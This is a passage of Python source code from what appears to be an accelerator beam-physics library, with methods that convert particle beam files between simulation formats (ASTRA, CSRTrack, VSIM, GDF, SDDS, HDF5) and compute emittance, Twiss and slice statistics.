(self.t-np.mean(self.t)) #np.full(len(self.t), 0) if 'Charge' in self.SDDSparameters and len(self.SDDSparameters['Charge']) > 0: self.beam['total_charge'] = self.SDDSparameters['Charge'][0] elif charge is None: self.beam['total_charge'] = 0 else: self.beam['total_charge'] = charge self.beam['charge'] = [] def write_SDDS_file(self, filename, ascii=False, xyzoffset=[0,0,0]): """Save an SDDS file using the SDDS class.""" xoffset = xyzoffset[0] yoffset = xyzoffset[1] zoffset = xyzoffset[2] # Don't think I need this because we are using t anyway... x = sdds.SDDS(self.sddsindex) if ascii: x.mode = x.SDDS_ASCII else: x.mode = x.SDDS_BINARY # {x, xp, y, yp, t, p, particleID} Cnames = ["x", "xp", "y", "yp", "t","p"] Ccolumns = ['x', 'xp', 'y', 'yp', 't', 'BetaGamma'] Ctypes = [x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE] Csymbols = ["", "x'","","y'","",""] Cunits = ["m","","m","","s","m$be$nc"] Ccolumns = [np.array(self.x) - float(xoffset), self.xp, np.array(self.y) - float(yoffset), self.yp, self.t , self.cp/self.E0_eV] # {Step, pCentral, Charge, Particles, IDSlotsPerBunch} Pnames = ["pCentral", "Charge", "Particles"] Ptypes = [x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_LONG] Psymbols = ["p$bcen$n", "", ""] Punits = ["m$be$nc", "C", ""] parameterData = [[np.mean(self.BetaGamma)], [abs(self.beam['total_charge'])], [len(self.x)]] for i in range(len(Ptypes)): x.defineParameter(Pnames[i], Psymbols[i], Punits[i],"","", Ptypes[i], "") x.setParameterValueList(Pnames[i], parameterData[i]) for i in range(len(Ctypes)): # name, symbol, units, description, formatString, type, fieldLength x.defineColumn(Cnames[i], Csymbols[i], Cunits[i],"","", Ctypes[i], 0) x.setColumnValueLists(Cnames[i], [list(Ccolumns[i])]) x.save(filename) def set_beam_charge(self, charge): self.beam['total_charge'] = charge def read_csv_file(self, file, delimiter=' '): with open(file, 'r') as f: data = np.array([l for l in csv.reader(f, delimiter=delimiter, quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)]) return data def write_csv_file(self, file, data): if sys.version_info[0] > 2: with open(file, 'w', newline='') as f: writer = csv.writer(f, delimiter=' ', quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True) [writer.writerow(l) for l in data] else: with open(file, 'wb') as f: writer = csv.writer(f, delimiter=' ', quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True) [writer.writerow(l) for l in data] def read_astra_beam_file(self, file, normaliseZ=False): starttime = time.time() self.reset_dicts() data = self.read_csv_file(file) # datanp = np.loadtxt(file) self.interpret_astra_data(data, normaliseZ=normaliseZ) # def read_hdf5_beam(self, data): # self.reset_dicts() # self.interpret_astra_data(data) def interpret_astra_data(self, data, normaliseZ=False): x, y, z, cpx, cpy, cpz, clock, charge, index, status = np.transpose(data) zref = z[0] self.beam['code'] = "ASTRA" self.beam['reference_particle'] = data[0] # if normaliseZ: # self.beam['reference_particle'][2] = 0 self.beam['longitudinal_reference'] = 'z' znorm = self.normalise_to_ref_particle(z, subtractmean=True) z = self.normalise_to_ref_particle(z, subtractmean=False) cpz = self.normalise_to_ref_particle(cpz, subtractmean=False) clock = self.normalise_to_ref_particle(clock, subtractmean=True) cp = np.sqrt(cpx**2 + cpy**2 + cpz**2) self.beam['x'] = x self.beam['y'] = y self.beam['z'] = z self.beam['px'] = cpx * self.q_over_c self.beam['py'] = cpy * self.q_over_c self.beam['pz'] = cpz * self.q_over_c self.beam['clock'] = 1.0e-9*clock self.beam['charge'] = 1.0e-9*charge self.beam['index'] = index self.beam['status'] = status # print self.Bz self.beam['t'] = [clock if status == -1 else ((z-zref) / (-1 * Bz * constants.speed_of_light)) for status, z, Bz, clock in zip(self.beam['status'], z, self.Bz, self.beam['clock'])] # self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]# self.beam['total_charge'] = np.sum(self.beam['charge']) def read_csrtrack_beam_file(self, file): self.reset_dicts() data = self.read_csv_file(file) self.beam['code'] = "CSRTrack" self.beam['reference_particle'] = data[0] self.beam['longitudinal_reference'] = 'z' z, x, y, cpz, cpx, cpy, charge = np.transpose(data[1:]) z = self.normalise_to_ref_particle(z, subtractmean=False) cpz = self.normalise_to_ref_particle(cpz, subtractmean=False) cp = np.sqrt(cpx**2 + cpy**2 + cpz**2) self.beam['x'] = x self.beam['y'] = y self.beam['z'] = z self.beam['px'] = cpx * self.q_over_c self.beam['py'] = cpy * self.q_over_c self.beam['pz'] = cpz * self.q_over_c self.beam['clock'] = np.full(len(self.x), 0) self.beam['clock'][0] = data[0, 0] * 1e-9 self.beam['index'] = np.full(len(self.x), 5) self.beam['status'] = np.full(len(self.x), 1) self.beam['t'] = self.z / (-1 * self.Bz * constants.speed_of_light)# [time if status is -1 else 0 for time, status in zip(clock, self.beam['status'])] self.beam['charge'] = charge self.beam['total_charge'] = np.sum(self.beam['charge']) def read_vsim_h5_beam_file(self, filename, charge=70e-12, interval=1): self.reset_dicts() with h5py.File(filename, "r") as h5file: data = np.array(h5file.get('/BeamElectrons'))[1:-1:interval] z, y, x, cpz, cpy, cpx = data.transpose() self.beam['code'] = "VSIM" self.beam['longitudinal_reference'] = 'z' cp = np.sqrt(cpx**2 + cpy**2 + cpz**2) self.beam['x'] = x self.beam['y'] = y self.beam['z'] = z self.beam['px'] = cpx * self.particle_mass self.beam['py'] = cpy * self.particle_mass self.beam['pz'] = cpz * self.particle_mass self.beam['t'] = [(z / (-1 * Bz * constants.speed_of_light)) for z, Bz in zip(self.z, self.Bz)] # self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]# self.beam['total_charge'] = charge self.beam['charge'] = [] def read_pacey_beam_file(self, file, charge=250e-12): self.reset_dicts() data = self.read_csv_file(file, delimiter='\t') self.beam['code'] = "TPaceyASTRA" self.beam['longitudinal_reference'] = 'z' x, y, z, cpx, cpy, cpz = np.transpose(data) cp = np.sqrt(cpx**2 + cpy**2 + cpz**2) self.beam['x'] = x self.beam['y'] = y self.beam['z'] = z self.beam['px'] = cpx * self.q_over_c self.beam['py'] = cpy * self.q_over_c self.beam['pz'] = cpz * self.q_over_c self.beam['t'] = [(z / (-1 * Bz * constants.speed_of_light)) for z, Bz in zip(self.z, self.Bz)] # self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]# self.beam['total_charge'] = charge self.beam['charge'] = [] def convert_csrtrackfile_to_astrafile(self, csrtrackfile, astrafile): data = self.read_csv_file(csrtrackfile) z, x, y, cpz, cpx, cpy, charge = np.transpose(data[1:]) charge = -charge*1e9 clock0 = (data[0, 0] / constants.speed_of_light) * 1e9 clock = np.full(len(x), 0) clock[0] = clock0 index = np.full(len(x), 1) status = np.full(len(x), 5) array = np.array([x, y, z, cpx, cpy, cpz, clock, charge, index, status]).transpose() self.write_csv_file(astrafile, array) def find_nearest_vector(self, nodes, node): return cdist([node], nodes).argmin() def rms(self, x, axis=None): return np.sqrt(np.mean(x**2, axis=axis)) def create_ref_particle(self, array, index=0, subtractmean=False): array[1:] = array[0] + array[1:] if subtractmean: array = array - np.mean(array) return array def write_astra_beam_file(self, file, index=1, status=5, charge=None, normaliseZ=False): if not isinstance(index,(list, tuple, np.ndarray)): if len(self.beam['charge']) == len(self.x): chargevector = 1e9*self.beam['charge'] else: chargevector = np.full(len(self.x), 1e9*self.charge/len(self.x)) if not isinstance(index,(list, tuple, np.ndarray)): indexvector = np.full(len(self.x), index) statusvector = self.beam['status'] if 'status' in self.beam else status if isinstance(status,(list, tuple, np.ndarray)) else np.full(len(self.x), status) ''' if a particle is emitting from the cathode it's z value is 0 and it's clock value is finite, otherwise z is finite and clock is irrelevant (thus zero) ''' if self.beam['longitudinal_reference'] == 't': zvector = [0 if status == -1 and t == 0 else z for status, z, t in zip(statusvector, self.z, self.t)] else: zvector = self.z ''' if the clock value is finite, we calculate it from the z value, using Betaz ''' # clockvector = [1e9*z / (1 * Bz * constants.speed_of_light) if status == -1 and t == 0 else 1.0e9*t for status, z, t, Bz in zip(statusvector, self.z, self.t, self.Bz)] clockvector = [1.0e9*t for status, z, t, Bz in zip(statusvector, self.z, self.t, self.Bz)] ''' this is the ASTRA array in all it's glory ''' array = np.array([self.x, self.y, zvector, self.cpx, self.cpy, self.cpz, clockvector, chargevector, indexvector, statusvector]).transpose() if 'reference_particle' in self.beam: ref_particle = self.beam['reference_particle'] # print 'we have a reference particle! ', ref_particle # np.insert(array, 0, ref_particle, axis=0) else: ''' take the rms - if the rms is 0 set it to 1, so we don't get a divide by error ''' rms_vector = [a if abs(a) > 0 else 1 for a in self.rms(array, axis=0)] ''' normalise the array ''' norm_array = array / rms_vector ''' take the meen of the normalised array ''' mean_vector = np.mean(norm_array, axis=0) ''' find the index of the vector that is closest to the mean - if you read in an ASTRA file, this should actually return the reference particle! ''' nearest_idx = self.find_nearest_vector(norm_array, mean_vector); ref_particle = array[nearest_idx] ''' set the closest mean vector to be in position 0 in the array ''' array = np.roll(array, -1*nearest_idx, axis=0) ''' normalise Z to the reference particle ''' array[1:,2] = array[1:,2] - ref_particle[2] ''' should we leave Z as the reference value, set it to 0, or set it to be some offset? ''' if not normaliseZ is False: array[0,2] = 0 if not isinstance(normaliseZ,(bool)): array[0,2] += normaliseZ ''' normalise pz and the clock ''' # print('Mean pz = ', np.mean(array[:,5])) array[1:,5] = array[1:,5] - ref_particle[5] array[0,6] = array[0,6] + ref_particle[6] np.savetxt(file, array, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%d','%d')) def write_vsim_beam_file(self, file, normaliseT=False): if len(self.beam['charge']) == len(self.x): chargevector = self.beam['charge'] else: chargevector = np.full(len(self.x), self.beam['total_charge']/len(self.x)) if normaliseT: tvector = self.t - np.mean(self.t) zvector = self.z - np.mean(self.z) else: tvector = self.t zvector = self.z zvector = [t * (1 * Bz * constants.speed_of_light) if z == 0 else z for z, t, Bz in zip(zvector, tvector, self.Bz)] ''' this is the VSIM array in all it's glory ''' array = np.array([zvector, self.y, self.x, self.Bz*self.gamma*constants.speed_of_light, self.By*self.gamma*constants.speed_of_light, self.Bx*self.gamma*constants.speed_of_light]).transpose() ''' take the rms - if the rms is 0 set it to 1, so we don't get a divide by error ''' np.savetxt(file, array, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e')) def write_gdf_beam_file(self, filename, normaliseZ=False): q = np.full(len(self.x), -1 * constants.elementary_charge) m = np.full(len(self.x), constants.electron_mass) nmacro = np.full(len(self.x), abs(self.beam['total_charge'] / constants.elementary_charge / len(self.x))) toffset = np.mean(self.z / (self.Bz * constants.speed_of_light)) z = self.z if not normaliseZ else (self.z - np.mean(self.z)) dataarray = np.array([self.x, self.y, z, q, m, nmacro, self.gamma*self.Bx, self.gamma*self.By, self.gamma*self.Bz]).transpose() namearray = 'x y z q m nmacro GBx GBy GBz' np.savetxt(filename, dataarray, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e'), header=namearray, comments='') def read_gdf_beam_file_object(self, file): if isinstance(file, (str)): gdfbeam = rgf.read_gdf_file(file) elif isinstance(file, (rgf.read_gdf_file)): gdfbeam = file else: raise Exception('file is not str or gdf object!') return gdfbeam def calculate_gdf_s(self, file): gdfbeam = self.read_gdf_beam_file_object(file) datagrab = gdfbeam.get_grab(0) avgt = [datagrab.avgt] position = [datagrab.position] sposition = list(zip(*list(sorted(zip(avgt[0], position[0])))))[1] ssposition = list(zip(sposition, list(sposition[1:])+[0])) offset = 0 spos = [] for p1,p2 in ssposition: spos += [p1 + offset] if p2 < p1: offset += p1 return spos def calculate_gdf_eta(self, file): gdfbeam = self.read_gdf_beam_file_object(file) etax = [] etaxp = [] tp = [] for p in gdfbeam.positions: self.read_gdf_beam_file(gdfbeam=gdfbeam, position=p) if len(self.x) > 0: e, ep, t = self.calculate_etax() etax += [e] etaxp += [ep] tp += [t] etax, etaxp = list(zip(*list(sorted(zip(tp, etax, etaxp)))))[1:] return etax, etaxp def read_gdf_beam_file_info(self, file): self.reset_dicts() gdfbeamdata = None gdfbeam = self.read_gdf_beam_file_object(file) print('grab_groups = ', gdfbeam.grab_groups) print(( 'Positions = ', gdfbeam.positions)) print(( 'Times = ', gdfbeam.times)) def read_gdf_beam_file(self, file=None, position=None, time=None, block=None, charge=None, longitudinal_reference='t', gdfbeam=None): self.reset_dicts() if gdfbeam is None and not file is None: gdfbeam = self.read_gdf_beam_file_object(file) elif gdfbeam is None and file is None: return None if position is not None:# and (time is not None or block is not None): # print 'Assuming position over time!' self.beam['longitudinal_reference'] = 't' gdfbeamdata = gdfbeam.get_position(position) if gdfbeamdata is not None: # print('GDF found position ', position) time = None block = None else: print('GDF DID NOT find position ', position) position = None elif position is None and time is not None and block is not None: # print 'Assuming time over block!' self.beam['longitudinal_reference'] = 'p' gdfbeamdata = gdfbeam.get_time(time) if gdfbeamdata is not None: block = None else: time = None elif position is None and time is None and block is not None: gdfbeamdata = gdfbeam.get_grab(block) if gdfbeamdata is None: block = None elif position is None and time is None and block is None: gdfbeamdata = gdfbeam.get_grab(0) self.beam['code'] = "GPT" self.beam['x'] = gdfbeamdata.x self.beam['y'] = gdfbeamdata.y if hasattr(gdfbeamdata,'z') and longitudinal_reference == 'z': # print( 'z!') # print(( gdfbeamdata.z)) self.beam['z'] = gdfbeamdata.z self.beam['t'] = np.full(len(self.z), 0)# self.z / (-1 * self.Bz * constants.speed_of_light) elif hasattr(gdfbeamdata,'t') and longitudinal_reference == 't': # print( 't!') self.beam['t'] = gdfbeamdata.t self.beam['z'] = (-1 * gdfbeamdata.Bz * constants.speed_of_light) * (gdfbeamdata.t-np.mean(gdfbeamdata.t)) + gdfbeamdata.z self.beam['gamma'] = gdfbeamdata.G if hasattr(gdfbeamdata,'q') and hasattr(gdfbeamdata,'nmacro'): self.beam['charge'] = gdfbeamdata.q * gdfbeamdata.nmacro self.beam['total_charge'] = np.sum(self.beam['charge']) else: if charge is None: self.beam['total_charge'] = 0 else: self.beam['total_charge'] = charge # print(( self.beam['charge'])) vx = gdfbeamdata.Bx * constants.speed_of_light vy = gdfbeamdata.By * constants.speed_of_light vz = gdfbeamdata.Bz * constants.speed_of_light velocity_conversion = 1 / (constants.m_e * self.beam['gamma']) self.beam['px'] = vx / velocity_conversion self.beam['py'] = vy / velocity_conversion self.beam['pz'] = vz / velocity_conversion return gdfbeam def rotate_beamXZ(self, theta, preOffset=[0,0,0], postOffset=[0,0,0]): preOffset=np.array(preOffset) postOffset=np.array(postOffset) rotation_matrix = np.array([[np.cos(theta), 0, np.sin(theta)], [0, 1, 0], [-1*np.sin(theta), 0, np.cos(theta)]]) beam = np.array([self.x,self.y,self.z]).transpose() self.beam['x'],self.beam['y'],self.beam['z'] = (np.dot(beam-preOffset, rotation_matrix)-postOffset).transpose() beam = np.array([self.px, self.py, self.pz]).transpose() self.beam['px'], self.beam['py'], self.beam['pz'] = np.dot(beam, rotation_matrix).transpose() if 'reference_particle' in self.beam: beam = np.array([self.beam['reference_particle'][0], self.beam['reference_particle'][1], self.beam['reference_particle'][2]]) self.beam['reference_particle'][0], self.beam['reference_particle'][1], self.beam['reference_particle'][2] = (np.dot([beam-preOffset], rotation_matrix)[0]-postOffset) # print 'rotated ref part = ', np.dot([beam-preOffset], rotation_matrix)[0] beam = np.array([self.beam['reference_particle'][3], self.beam['reference_particle'][4], self.beam['reference_particle'][5]]) self.beam['reference_particle'][3], self.beam['reference_particle'][4], self.beam['reference_particle'][5] = np.dot([beam], rotation_matrix)[0] self.beam['rotation'] = theta self.beam['offset'] = preOffset def unrotate_beamXZ(self): offset = self.beam['offset'] if 'offset' in self.beam else np.array([0,0,0]) if 'rotation' in self.beam or abs(self.beam['rotation']) > 0: self.rotate_beamXZ(-1*self.beam['rotation'], -1*offset) def write_HDF5_beam_file(self, filename, centered=False, mass=constants.m_e, sourcefilename=None, pos=None, rotation=None, longitudinal_reference='t', zoffset=0): # print('zoffset = ', zoffset, type(zoffset)) if isinstance(zoffset,(list, np.ndarray)) and len(zoffset) == 3: xoffset = zoffset[0] yoffset = zoffset[1] zoffset = zoffset[2] else: xoffset = 0 yoffset = 0 # print('xoffset = ', xoffset) # print('yoffset = ', yoffset) # print('zoffset = ', zoffset) with h5py.File(filename, "w") as f: inputgrp = f.create_group("Parameters") if not 'total_charge' in self.beam or self.beam['total_charge'] == 0: self.beam['total_charge'] = np.sum(self.beam['charge']) if sourcefilename is not None: inputgrp['Source'] = sourcefilename if pos is not None: inputgrp['Starting_Position'] = pos else: inputgrp['Starting_Position'] = [0, 0, 0] if rotation is not None: inputgrp['Rotation'] = rotation else: inputgrp['Rotation'] = 0 inputgrp['total_charge'] = self.beam['total_charge'] inputgrp['npart'] = len(self.x) inputgrp['centered'] = centered inputgrp['code'] = self.beam['code'] inputgrp['particle_mass'] = mass beamgrp = f.create_group("beam") if 'reference_particle' in self.beam: beamgrp['reference_particle'] = self.beam['reference_particle'] if 'status' in self.beam: beamgrp['status'] = self.beam['status'] beamgrp['longitudinal_reference'] = longitudinal_reference if len(self.beam['charge']) == len(self.x): chargevector = self.beam['charge'] else: chargevector = np.full(len(self.x), self.charge/len(self.x)) array = np.array([self.x + xoffset, self.y + yoffset, self.z + zoffset, self.cpx, self.cpy, self.cpz, self.t, chargevector]).transpose() beamgrp['columns'] = np.array(['x','y','z', 'cpx', 'cpy', 'cpz', 't', 'q'], dtype='S') beamgrp['units'] = np.array(['m','m','m','eV','eV','eV','s','e'], dtype='S') beamgrp.create_dataset("beam", data=array) def read_HDF5_beam_file(self, filename, local=False): self.reset_dicts() with h5py.File(filename, "r") as h5file: if h5file.get('beam/reference_particle') is not None: self.beam['reference_particle'] = np.array(h5file.get('beam/reference_particle')) if h5file.get('beam/longitudinal_reference') is not None: self.beam['longitudinal_reference'] = np.array(h5file.get('beam/longitudinal_reference')) else: self.beam['longitudinal_reference'] = 't' if h5file.get('beam/status') is not None: self.beam['status'] = np.array(h5file.get('beam/status')) x, y, z, cpx, cpy, cpz, t, charge = np.array(h5file.get('beam/beam')).transpose() cp = np.sqrt(cpx**2 + cpy**2 + cpz**2) self.beam['x'] = x self.beam['y'] = y self.beam['z'] = z # self.beam['cpx'] = cpx # self.beam['cpy'] = cpy # self.beam['cpz'] = cpz self.beam['px'] = cpx * self.q_over_c self.beam['py'] = cpy * self.q_over_c self.beam['pz'] = cpz * self.q_over_c # self.beam['cp'] = cp # self.beam['p'] = cp * self.q_over_c # self.beam['xp'] = np.arctan(self.px/self.pz) # self.beam['yp'] = np.arctan(self.py/self.pz) self.beam['clock'] = np.full(len(self.x), 0) # self.beam['gamma'] = np.sqrt(1+(self.cp/self.E0_eV)**2) # velocity_conversion = 1 / (constants.m_e * self.gamma) # self.beam['vx'] = velocity_conversion * self.px # self.beam['vy'] = velocity_conversion * self.py # self.beam['vz'] = velocity_conversion * self.pz # self.beam['Bx'] = self.vx / constants.speed_of_light # self.beam['By'] = self.vy / constants.speed_of_light # self.beam['Bz'] = self.vz / constants.speed_of_light self.beam['t'] = t self.beam['charge'] = charge self.beam['total_charge'] = np.sum(self.beam['charge']) startposition = np.array(h5file.get('/Parameters/Starting_Position')) startposition = startposition if startposition is not None else [0,0,0] self.beam['starting_position'] = startposition theta = np.array(h5file.get('/Parameters/Rotation')) theta = theta if theta is not None else 0 self.beam['rotation'] = theta if local == True: self.rotate_beamXZ(self.beam['rotation'], preOffset=self.beam['starting_position']) ''' ******************** Statistical Parameters ************************* ''' def kde_function(self, x, bandwidth=0.2, **kwargs): """Kernel Density Estimation with Scipy""" # Note that scipy weights its bandwidth by the covariance of the # input data. To make the results comparable to the other methods, # we divide the bandwidth by the sample standard deviation here. # Taken from https://jakevdp.github.io/blog/2013/12/01/kernel-density-estimation/ if not hasattr(self, '_kde_x') or not len(x) == len(self._kde_x) or not np.allclose(x, self._kde_x) or not bandwidth == self._kde_bandwidth: self._kde_x = x self._kde_bandwidth = bandwidth self._kde_function = gaussian_kde(x, bw_method=bandwidth / x.std(ddof=1), **kwargs) return self._kde_function def PDF(self, x, x_grid, bandwidth=0.2, **kwargs): kde = self.kde_function(x, bandwidth, **kwargs) return kde.evaluate(x_grid) def PDFI(self, x, x_grid, bandwidth=0.2, **kwargs): kde = self.kde_function(x, bandwidth, **kwargs) vals = kde.evaluate(x_grid) f = lambda bin, val: self.charge / len(self.t) * (val / bin) return vals#self.charge * vals / (2*abs(x_grid[1] - x_grid[0])) / len(self.t) #[f(x_grid[1] - x_grid[0], v) for v in vals] def CDF(self, x, x_grid, bandwidth=0.2, **kwargs): kde = self.kde_function(x, bandwidth, **kwargs) cdf = np.vectorize(lambda e: kde.integrate_box_1d(x_grid[0], e)) return cdf(x_grid) def FWHM(self, X, Y, frac=0.5): frac = 1.0/frac if frac > 1 else frac d = Y - (max(Y) * frac) indexes = np.where(d > 0)[0] return abs(X[indexes][-1] - X[indexes][0]), indexes def covariance(self, u, up): u2 = u - np.mean(u) up2 = up - np.mean(up) return np.mean(u2*up2) - np.mean(u2)*np.mean(up2) def emittance(self, x, xp, p=None): cov_x = self.covariance(x, x) cov_xp = self.covariance(xp, xp) cov_x_xp = self.covariance(x, xp) emittance = np.sqrt(cov_x * cov_xp - cov_x_xp**2) if (cov_x * cov_xp - cov_x_xp**2) > 0 else 0 if p is None: return emittance else: gamma = np.mean(p)/self.E0_eV return gamma*emittance @property def volume(self): return self.volume6D(self.x, self.y, self.z-np.mean(self.z), self.cpx/self.cpz, self.cpy/self.cpz, ((self.cpz/np.mean(self.cp)) - 1)) @property def density(self): return len(self.x) / self.volume def volume6D(self, x, y, t, xp, yp, cp): if len(x) < 10: return 1e6 else: beam = list(zip(x, y, t, xp, yp, cp)) return ConvexHull(beam, qhull_options='QJ').volume def mve_emittance(self, x, xp, p=None): (center, radii, rotation, hullP) = MVE.getMinVolEllipse(list(zip(x,xp)), .01) emittance = radii[0] * radii[1] if p is None: return emittance else: gamma = np.mean(p)/self.E0_eV return gamma*emittance @property def normalized_horizontal_emittance(self): return self.emittance(self.x, self.xp, self.cp) @property def normalized_vertical_emittance(self): return self.emittance(self.y, self.yp, self.cp) @property def horizontal_emittance(self): return self.emittance(self.x, self.xp) @property def vertical_emittance(self): return self.emittance(self.y, self.yp) @property def normalized_mve_horizontal_emittance(self): return self.mve_emittance(self.x, self.xp, self.cp) @property def normalized_mve_vertical_emittance(self): return self.mve_emittance(self.y, self.yp, self.cp) @property def horizontal_mve_emittance(self): return self.mve_emittance(self.x, self.xp) @property def vertical_mve_emittance(self): return self.mve_emittance(self.y, self.yp) @property def horizontal_emittance_90(self): emit = self.horizontal_emittance alpha = self.alpha_x beta = self.beta_x gamma = self.gamma_x emiti = gamma * self.x**2 + 2 * alpha * self.x * self.xp + beta * self.xp * self.xp return sorted(emiti)[int(0.9*len(emiti)-0.5)] @property def normalized_horizontal_emittance_90(self): emit = self.horizontal_emittance_90 return np.mean(self.cp)/self.E0_eV * emit @property def vertical_emittance_90(self): emit = self.vertical_emittance alpha = self.alpha_y beta = self.beta_y gamma = self.gamma_y emiti = gamma * self.y**2 + 2 * alpha * self.y * self.yp + beta * self.yp * self.yp return sorted(emiti)[int(0.9*len(emiti)-0.5)] @property def normalized_vertical_emittance_90(self): emit = self.vertical_emittance_90 return np.mean(self.cp)/self.E0_eV * emit @property def beta_x(self): self.twiss['beta_x'] = self.covariance(self.x,self.x) / self.horizontal_emittance return self.twiss['beta_x'] @property def alpha_x(self): self.twiss['alpha_x'] = -1*self.covariance(self.x,self.xp) / self.horizontal_emittance return self.twiss['alpha_x'] @property def gamma_x(self): self.twiss['gamma_x'] = self.covariance(self.xp,self.xp) / self.horizontal_emittance return self.twiss['gamma_x'] @property def beta_y(self): self.twiss['beta_y'] = self.covariance(self.y,self.y) / self.vertical_emittance return self.twiss['beta_y'] @property def alpha_y(self): self.twiss['alpha_y'] = -1*self.covariance(self.y,self.yp) / self.vertical_emittance return self.twiss['alpha_y'] @property def gamma_y(self): self.twiss['gamma_y'] = self.covariance(self.yp,self.yp) / self.vertical_emittance return self.twiss['gamma_y'] @property def twiss_analysis(self): return self.horizontal_emittance, self.alpha_x, self.beta_x, self.gamma_x, self.vertical_emittance, self.alpha_y, self.beta_y, self.gamma_y def eta_correlation(self, u): return self.covariance(u,self.p) / self.covariance(self.p, self.p) def eta_corrected(self, u): return u - self.eta_correlation(u)*self.p @property def horizontal_emittance_corrected(self): xc = self.eta_corrected(self.x) xpc = self.eta_corrected(self.xp) return self.emittance(xc, xpc) @property def vertical_emittance_corrected(self): yc = self.eta_corrected(self.y) ypc = self.eta_corrected(self.yp) return self.emittance(yc, ypc) @property def beta_x_corrected(self): xc = self.eta_corrected(self.x) self.twiss['beta_x'] = self.covariance(xc, xc) / self.horizontal_emittance_corrected return self.twiss['beta_x'] @property def alpha_x_corrected(self): xc = self.eta_corrected(self.x) xpc = self.eta_corrected(self.xp) self.twiss['alpha_x'] = -1*self.covariance(xc, xpc) / self.horizontal_emittance_corrected return self.twiss['alpha_x'] @property def gamma_x_corrected(self): xpc = self.eta_corrected(self.xp) self.twiss['gamma_x'] = self.covariance(xpc, xpc) / self.horizontal_emittance_corrected return self.twiss['gamma_x'] @property def beta_y_corrected(self): yc = self.eta_corrected(self.y) self.twiss['beta_y'] = self.covariance(yc,yc) / self.vertical_emittance_corrected return self.twiss['beta_y'] @property def alpha_y_corrected(self): yc = self.eta_corrected(self.y) ypc = self.eta_corrected(self.yp) self.twiss['alpha_y'] = -1*self.covariance(yc, ypc) / self.vertical_emittance_corrected return self.twiss['alpha_y'] @property def gamma_y_corrected(self): ypc = self.eta_corrected(self.yp) self.twiss['gamma_y'] = self.covariance(ypc,ypc) / self.vertical_emittance_corrected return self.twiss['gamma_y'] @property def twiss_analysis_corrected(self): return self.horizontal_emittance_corrected, self.alpha_x_corrected, self.beta_x_corrected, self.gamma_x_corrected, \ self.vertical_emittance_corrected, self.alpha_y_corrected, self.beta_y_corrected, self.gamma_y_corrected @property def slice_length(self): return self._slicelength @slice_length.setter def slice_length(self, slicelength): self._slicelength = slicelength @property def slices(self): return self._slices @slices.setter def slices(self, slices): twidth = (max(self.t) - min(self.t)) if twidth == 0: t = self.z / (-1 * self.Bz * constants.speed_of_light) twidth = (max(t) - min(t)) if slices == 0: slices = int(twidth / 0.1e-12) self._slices = slices self._slicelength = twidth / self._slices def bin_time(self): if not hasattr(self,'slice'): self.slice = {} if not hasattr(self,'_slicelength'): self.slice_length = 0 # print("Assuming slice length is 100 fs") twidth = (max(self.t) - min(self.t)) if twidth == 0: t = self.z / (-1 * self.Bz * constants.speed_of_light) twidth = (max(t) - min(t)) else: t = self.t if not self.slice_length > 0.0: self.slice_length = twidth / 20.0 nbins = max([1,int(np.ceil(twidth / self.slice_length))])+2 self._hist, binst = np.histogram(t, bins=nbins, range=(min(t)-self.slice_length, max(t)+self.slice_length)) self.slice['t_Bins'] = binst self._t_binned = np.digitize(t, self.slice['t_Bins']) self._tfbins = [[self._t_binned == i] for i in range(1, len(binst))] self._tbins = [np.array(self.t)[tuple(tbin)] for tbin in self._tfbins] self._cpbins = [np.array(self.cp)[tuple(tbin)] for tbin in self._tfbins] def bin_momentum(self, width=10**6): if not hasattr(self,'slice'): self.slice = {} pwidth = (max(self.cp) - min(self.cp)) if width is None: self.slice_length_cp = pwidth / self.slices else: self.slice_length_cp = width nbins = max([1,int(np.ceil(pwidth / self.slice_length_cp))])+2 self._hist, binst = np.histogram(self.cp, bins=nbins, range=(min(self.cp)-self.slice_length_cp, max(self.cp)+self.slice_length_cp)) self.slice['cp_Bins'] = binst self._cp_binned = np.digitize(self.cp, self.slice['cp_Bins']) self._tfbins = [np.array([self._cp_binned == i]) for i in range(1, len(binst))] self._cpbins = [self.cp[tuple(cpbin)] for cpbin in self._tfbins] self._tbins = [self.t[tuple(cpbin)] for cpbin in self._tfbins] @property def slice_bins(self): if not hasattr(self,'slice'): self.bin_time() bins = self.slice['t_Bins'] return (bins[:-1] + bins[1:]) / 2 # return [t.mean() for t in ] @property def slice_cpbins(self): if not hasattr(self,'slice'): self.bin_momentum() bins = self.slice['cp_Bins'] return (bins[:-1] + bins[1:]) / 2 # return [t.mean() for t in ] @property def slice_momentum(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() self.slice['Momentum'] = np.array([cpbin.mean() if len(cpbin) > 0 else 0 for cpbin in self._cpbins ]) return self.slice['Momentum'] @property def slice_momentum_spread(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() self.slice['Momentum_Spread'] = np.array([cpbin.std() if len(cpbin) > 0 else 0 for cpbin in self._cpbins]) return self.slice['Momentum_Spread'] @property def slice_relative_momentum_spread(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() self.slice['Relative_Momentum_Spread'] = np.array([100*cpbin.std()/cpbin.mean() if len(cpbin) > 0 else 0 for cpbin in self._cpbins]) return self.slice['Relative_Momentum_Spread'] def slice_data(self, data): return [data[tuple(tbin)] for tbin in self._tfbins] def emitbins(self, x, y): xbins = self.slice_data(x) ybins = self.slice_data(y) return list(zip(*[xbins, ybins, self._cpbins])) @property def slice_6D_Volume(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() xbins = self.slice_data(self.x) ybins = self.slice_data(self.y) zbins = self.slice_data(self.z-np.mean(self.z)) pxbins = 